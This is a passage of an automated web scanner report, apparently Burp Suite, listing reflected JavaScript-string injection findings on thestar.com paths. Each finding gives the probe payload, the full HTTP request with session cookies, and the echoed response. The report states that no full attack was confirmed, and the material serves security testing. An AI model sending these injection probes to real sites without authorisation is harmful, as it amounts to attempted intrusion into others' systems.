User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1299368826776%3E0%3A1-16%3A2; __utmz=129518793.1299368840.3.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129518793.1069648812.1297974345.1297998573.1299368836.3; fbsetting_e52ab4b1285fa2e64697937423b7772b=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sun, 06 Mar 2011 02:15:09 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-4
cache-control: public, max-age=300
Date: Sun, 06 Mar 2011 02:09:02 GMT
X-Varnish: 1625795492
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-2
X-Cache: MISS
Set-Cookie: BIGipServerTOPS-WebFarm5=587273132.20480.0000; path=/
Content-Length: 51321


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_f1661';02cd8921a85_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.11. http://www.thestar.com/includes/headerweather [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /includes/headerweather

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbef7'%3ba58c0584ff8 was submitted in the REST URL parameter 1. This input was echoed as bbef7';a58c0584ff8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /includesbbef7'%3ba58c0584ff8/headerweather?CurrentEdition=toronto HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; ASP.NET_SessionId=s3nyc032t0kvzc2e1vv1gv45; BIGipServerTOPS-WebFarm5=604050348.20480.0000; s_cc=true; s_vnumb=1299368826776%3E0%3A1-16%3A2; s_vnumb_s=3; s_sq=%5B%5BB%5D%5D; __utmz=129518793.1299368840.3.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129518793.1069648812.1297974345.1297998573.1299368836.3; __utmc=129518793; __utmb=129518793.1.10.1299368836

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 05 Mar 2011 23:52:14 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-2
cache-control: public, max-age = 120
X-TOPS-CacheReason: Weather
Date: Sat, 05 Mar 2011 23:47:40 GMT
X-Varnish: 2676966993
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 52349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_includesbbef7';a58c0584ff8_headerweather_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.12. http://www.thestar.com/includes/headerweather [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /includes/headerweather

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d80f'%3b115d8f4a473 was submitted in the REST URL parameter 2. This input was echoed as 6d80f';115d8f4a473 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /includes/headerweather6d80f'%3b115d8f4a473?CurrentEdition=toronto HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; ASP.NET_SessionId=s3nyc032t0kvzc2e1vv1gv45; BIGipServerTOPS-WebFarm5=604050348.20480.0000; s_cc=true; s_vnumb=1299368826776%3E0%3A1-16%3A2; s_vnumb_s=3; s_sq=%5B%5BB%5D%5D; __utmz=129518793.1299368840.3.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129518793.1069648812.1297974345.1297998573.1299368836.3; __utmc=129518793; __utmb=129518793.1.10.1299368836

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 05 Mar 2011 23:53:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-2
cache-control: public, max-age = 120
X-TOPS-CacheReason: Weather
Date: Sat, 05 Mar 2011 23:48:38 GMT
X-Varnish: 2676973537
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 52205


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_includes_headerweather6d80f';115d8f4a473_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.13. http://www.thestar.com/includes/promostrip [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /includes/promostrip

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a47d3'%3b77da429e463 was submitted in the REST URL parameter 1. This input was echoed as a47d3';77da429e463 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /includesa47d3'%3b77da429e463/promostrip HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1297998572502%3E0%3A2; __utma=129518793.1069648812.1297974345.1297974345.1297998573.2; ASP.NET_SessionId=s3nyc032t0kvzc2e1vv1gv45; BIGipServerTOPS-WebFarm5=604050348.20480.0000

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 05 Mar 2011 23:49:46 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-1
cache-control: public, max-age=600
Date: Sat, 05 Mar 2011 23:45:12 GMT
X-Varnish: 2676950274
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 52136


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_includesa47d3';77da429e463_promostrip_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.14. http://www.thestar.com/includes/promostrip [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /includes/promostrip

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caa1c'%3b831feec3a2d was submitted in the REST URL parameter 2. This input was echoed as caa1c';831feec3a2d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /includes/promostripcaa1c'%3b831feec3a2d HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1297998572502%3E0%3A2; __utma=129518793.1069648812.1297974345.1297974345.1297998573.2; ASP.NET_SessionId=s3nyc032t0kvzc2e1vv1gv45; BIGipServerTOPS-WebFarm5=604050348.20480.0000

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 05 Mar 2011 23:50:43 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-1
cache-control: public, max-age=600
Date: Sat, 05 Mar 2011 23:46:09 GMT
X-Varnish: 2676956757
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 51992


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_includes_promostripcaa1c';831feec3a2d_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.15. http://www.thestar.com/living [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /living

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86be4'%3b07344c6ffdd was submitted in the REST URL parameter 1. This input was echoed as 86be4';07344c6ffdd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /living86be4'%3b07344c6ffdd HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/Toplets/User
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; __utmz=129518793.1299368840.3.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerTOPS-WebFarm5=604050348.20480.0000; UserLastLogin=2011-03-05 21:13:39; s_cc=true; __utma=129518793.1069648812.1297974345.1299368836.1299377659.4; __utmc=129518793; __utmb=129518793.1.10.1299377659; fbsetting_e52ab4b1285fa2e64697937423b7772b=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; s_vnumb=1299377668448%3E0%3A2-16%3A2; s_vnumb_s=4; s_sq=thestarprod%3D%2526pid%253Dhttp%25253A//www.thestar.com/Toplets/User%252523%2526oid%253Dhttp%25253A//www.thestar.com/living%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sun, 06 Mar 2011 02:15:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-5
cache-control: public, max-age = 300
X-TOPS-CacheReason: Living
Date: Sun, 06 Mar 2011 02:10:25 GMT
X-Varnish: 2677887995
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 51625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_living86be4';07344c6ffdd_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.16. http://www.thestar.com/mostpopular [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /mostpopular

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5a51'%3bbdf442cac97 was submitted in the REST URL parameter 1. This input was echoed as b5a51';bdf442cac97 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mostpopularb5a51'%3bbdf442cac97?category=living&WMP_ApplyGoogleAnalytics=false&WMP_Type=Widget&MP_Home=Living HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/living
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; __utmz=129518793.1299368840.3.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerTOPS-WebFarm5=604050348.20480.0000; __utma=129518793.1069648812.1297974345.1299368836.1299377659.4; __utmc=129518793; __utmb=129518793.1.10.1299377659; fbsetting_e52ab4b1285fa2e64697937423b7772b=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; ASP.NET_SessionId=xdm4x3j0km1sykaga4b4i345; UserLastLogin=2011-03-05 21:06:35; s_cc=true; s_vnumb=1299377691618%3E0%3A2-16%3A2; s_vnumb_s=4; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sun, 06 Mar 2011 02:17:17 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-5
cache-control: public, max-age = 300
Date: Sun, 06 Mar 2011 02:12:42 GMT
X-Varnish: 2677902752
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 52176


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_mostpopularb5a51';bdf442cac97_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.17. http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d1f'%3b495399b4667 was submitted in the REST URL parameter 1. This input was echoed as 66d1f';495399b4667 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news66d1f'%3b495399b4667/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1297998572502%3E0%3A2; __utma=129518793.1069648812.1297974345.1297974345.1297998573.2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 05 Mar 2011 23:49:43 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-2
cache-control: public, max-age = 600
X-TOPS-CacheReason: Article
Date: Sat, 05 Mar 2011 23:43:14 GMT
X-Varnish: 2573475220
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-1
X-Cache: MISS
Set-Cookie: BIGipServerTOPS-WebFarm5=553718700.20480.0000; path=/
Content-Length: 73900


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_news66d1f';495399b4667_world_pirates_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.18. http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27b95'%3b31b18699d9f was submitted in the REST URL parameter 2. This input was echoed as 27b95';31b18699d9f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/world27b95'%3b31b18699d9f/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1297998572502%3E0%3A2; __utma=129518793.1069648812.1297974345.1297974345.1297998573.2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 05 Mar 2011 23:50:45 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-5
cache-control: public, max-age = 600
X-TOPS-CacheReason: Article
Date: Sat, 05 Mar 2011 23:46:12 GMT
X-Varnish: 2676957051
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Set-Cookie: BIGipServerTOPS-WebFarm5=604050348.20480.0000; path=/
Content-Length: 101672


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/1471994/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_news_world27b95';31b18699d9f_pirates_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.19. http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97799'%3b1ec10bdf03f was submitted in the REST URL parameter 3. This input was echoed as 97799';1ec10bdf03f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/world/pirates97799'%3b1ec10bdf03f/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1297998572502%3E0%3A2; __utma=129518793.1069648812.1297974345.1297974345.1297998573.2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 05 Mar 2011 23:51:57 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-2
cache-control: public, max-age = 600
X-TOPS-CacheReason: Article
Date: Sat, 05 Mar 2011 23:45:28 GMT
X-Varnish: 2573490960
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-1
X-Cache: MISS
Set-Cookie: BIGipServerTOPS-WebFarm5=553718700.20480.0000; path=/
Content-Length: 100430


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/1471994/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_news_world_pirates97799';1ec10bdf03f_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.20. http://www.thestar.com/tops-counter [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /tops-counter

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9695b'%3b70d3a961d05 was submitted in the REST URL parameter 1. This input was echoed as 9695b';70d3a961d05 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tops-counter9695b'%3b70d3a961d05?uid=947793&counter= HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1297998572502%3E0%3A2; __utma=129518793.1069648812.1297974345.1297974345.1297998573.2; ASP.NET_SessionId=s3nyc032t0kvzc2e1vv1gv45; BIGipServerTOPS-WebFarm5=604050348.20480.0000

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 05 Mar 2011 23:50:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-5
cache-control: public, max-age = 300
Date: Sat, 05 Mar 2011 23:45:26 GMT
X-Varnish: 2676951888
Age: 0
Via: 1.1 varnish
Connection: keep-alive
